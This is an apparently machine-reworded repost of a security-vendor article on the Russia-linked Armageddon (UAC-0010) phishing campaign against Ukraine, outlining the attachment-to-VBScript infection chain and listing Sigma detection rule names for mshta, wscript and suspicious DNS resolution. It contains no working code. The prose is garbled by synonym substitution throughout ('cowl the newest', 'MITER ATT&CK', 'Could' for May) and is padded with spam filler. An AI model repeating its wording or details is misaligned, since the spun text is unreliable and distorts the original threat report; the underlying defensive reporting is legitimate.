about Armageddon APT Hacker Group, often known as UAC-0010, spreads phishing emails posing because the State Service for Particular Communications of Ukraine

will cowl the newest and most present counsel with reference to the world. go browsing slowly appropriately you comprehend competently and appropriately. will lump your data easily and reliably

Armageddon APT alias UAC-0010 resurfaces

Armageddon APT, often known as Gamaredon or UAC-0010, linked to Russia, has been launching a sequence of cyber assaults in Ukraine for the reason that outbreak of the worldwide cyber warfare. On November 8, 2022, CERT-UA printed the newest alert detailing the continuing ongoing phishing marketing campaign by this Russian-backed cyber-espionage hacker collective, by which adversaries mass-distribute solid emails posing because the State Service. of Particular Communications of Ukraine. On this adversarial focused marketing campaign, Armageddon APT hackers exploit the assault vector of malicious e-mail attachments.

Armageddon APT (UAC-0010) Cyber ​​Assaults: Evaluation of the Newest Phishing Marketing campaign In opposition to Ukraine

Since Russia’s full-scale invasion of Ukraine, the infamous Russia-linked Armageddon APT group, additionally tracked as UAC-0010 or Primitive Bear, has been actively exploiting phishing assault vectors and malicious e-mail attachments in campaigns directed towards Ukraine. In Could and July 2022, the hacker collective massively distributed the GammaLoad.PS1_v2 malware, whereas in August 2022, the adversaries utilized the GammaSteel.PS1 and GammaSteel.NET malware to unfold the an infection on compromised techniques.

Within the ongoing adversary campaigns reported by the CERT-UA#5570 alert, the an infection chain is triggered by phishing emails that comprise a malicious attachment that, if opened, downloads an HTML file with JavaScript code. The latter creates a RAR file with a shortcut LNK file on the weak laptop. As soon as opened, the aforementioned LNK file downloads and executes an HTA file, which in flip executes malicious VBScript code. Consequently, this results in the deployment of various malicious strains on the focused techniques, together with information-stealing malware samples.

CERT-UA researchers report that phishing emails are despatched by way of the @mail.gov.ua service. Moreover, Armageddon APT hackers apply their widespread adversary patterns to launch cyber assaults utilizing a 3rd celebration service or Telegram to establish the C2 server IP handle.

Detecting the newest Armageddon APT marketing campaign towards Ukrainian entities

A sequence of Russia-linked Armageddon APT phishing campaigns repeatedly concentrating on Ukraine since March 2022 pose a rising risk that requires well timed detection and powerful response by safety professionals. SOC Prime’s detection-as-code platform provides a set of curated Sigma guidelines to establish associated malicious exercise lined within the CERT-UA#5570 alert early within the assault lifecycle. Comply with the hyperlink under to entry the related detection content material tagged “CERT-UA#5570” primarily based on the corresponding cybersecurity alert:

Sigma guidelines to detect malicious exercise of the UAC-0010 group lined in alert CERT-UA#5570

To proactively defend towards current and rising Armageddon APT cyber assaults tracked by cyber defenders since Russia’s full-scale invasion of Ukraine, press the Discover detections and entry the devoted detection stack. All Sigma guidelines are aligned with MITER ATT&CK® and enriched with in depth cyber risk context, together with related CTI hyperlinks, mitigations, executable binaries, and most related metadata. Detection guidelines are filled with translations to industry-leading SIEM, EDR, and XDR options.

Discover detections

To simplify routine risk looking and enhance detection engineering capabilities, safety specialists can seek for IOCs related to malicious exercise from UAC-0010 adversaries lined in CERT Alert-UA#5570. Merely paste the textual content containing the related IOCs into Uncoder CTI and get customized IOC queries able to run in a selected surroundings.

ICS for alert CERT-UA#5570 using Uncoder CTI

MITER ATT&CK® Context

To delve into the context behind the newest cyberattacks from the Russia-linked Armageddon APT group, often known as UAC-0010 lined in CERT-UA#5570 alert, all of Sigma’s devoted guidelines are aligned with the MITER ATT&CK® framework that addresses the corresponding ways and methods:

Tactic 

Strategies

sigma rule

protection evasion

Signed binary proxy execution (T1218)

LOLBAS Wscript (by way of process_creation)

LOLBAS mshta (by way of cmdline)

Execution

Command Interpreter and Scripts (T1059)

LOLBAS Wscript (by way of

process_creation)

command and management

Protocol Tunnel (T1572)

Suspicious DNS decision utilizing third celebration companies (by way of proxy)

Suspicious DNS decision utilizing third celebration companies (by way of dns)

Put up Armageddon APT Hacker Group, often known as UAC-0010, spreads phishing emails posing because the State Service for Particular Communications of Ukraine appeared first on SOC Prime.

I hope the article very almost Armageddon APT Hacker Group, often known as UAC-0010, spreads phishing emails posing because the State Service for Particular Communications of Ukraine

provides notion to you and is helpful for add-on to your data

Armageddon APT Hacker Group, also known as UAC-0010, spreads phishing emails posing as the State Service for Special Communications of Ukraine

Leave a Reply